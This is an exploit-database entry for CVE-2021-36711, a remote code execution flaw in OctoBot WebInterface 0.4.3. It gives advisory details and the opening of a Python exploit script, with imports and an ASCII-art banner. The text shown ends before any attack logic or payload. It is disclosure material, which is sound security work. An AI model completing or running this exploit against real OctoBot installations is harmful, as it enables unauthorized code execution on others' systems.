Authored by Samy Younsi, Thomas Knudsen

OctoBot WebInterface version 0.4.3 suffers from a remote code execution vulnerability.

advisories | CVE-2021-36711

# Exploit Title: OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)
# Date: 9/2/2021
# Exploit Author: Samy Younsi, Thomas Knudsen
# Vendor Homepage: https://www.octobot.online/
# Software Link: https://github.com/Drakkar-Software/OctoBot
# Version: 0.4.0beta3 - 0.4.3
# Tested on: Linux (Ubuntu, CentOs)
# CVE : CVE-2021-36711

from __future__ import print_function, unicode_literals
from bs4 import BeautifulSoup
import argparse
import requests
import zipfile
import time
import sys
import os

def banner():
sashimiLogo = """
_________ . .
(.. _ , | /|
O /| / /
______ / | /
vvvv | / |
_ _ _ _ ^^^^ == _/ |
| | __ _ | || |__ (_)_ __ ___ (_)`_ === . |
/ __)/ _` / __| '_ | | '_ ` _ | |/ /_ / |
__ | (_| __ | | | | | | | | | | ||/ _ | /
( /__,_( |_| |_|_|_| |_| |_|_| ________/
|_| |_|